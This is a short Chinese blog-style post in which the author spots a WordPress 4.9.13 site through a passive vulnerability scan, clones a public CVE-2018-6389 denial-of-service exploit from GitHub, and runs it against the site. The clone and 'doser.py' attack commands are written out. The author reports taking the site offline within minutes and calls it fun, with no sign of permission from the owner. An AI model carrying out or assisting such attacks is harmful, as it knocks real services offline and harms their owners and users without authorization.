不起跬步,无以至千里;不积小流,无以成江海
xray开着被动扫描,发现有个爆红了
看了看也没啥重要的东西,寻思着好不容易报个红,就看看这个站吧
然后Whatweb上去扫,发现使用的CMS是wordpress ,版本是4.9.13
之前一个朋友用wordpress的一个拒绝服务漏洞,搞了个腾讯的子站交SRC,然后我寻思这个站有没有漏洞
然后就去GitHub上面搜索,发现WordPress 4.9.x版本以下都存在拒绝服务攻击,包括4.9.x
这个站版本是 4.9.13 ,那还废啥话
克隆
git clone https://github.com/ianxtianxt/CVE-2018-6389.git
攻击
python doser.py -t 999 -g 'https://domain.com'
因为我之前执行过攻击命令,现在演示还要重新执行一遍
history 查看历史命令
然后在命令行中,可以使用符号 ! 执行指定序号的历史命令
例如,我这里要执行第331个历史命令,则输入 !331 就行了
没过几分钟,网站就真的被打死了,还挺好玩
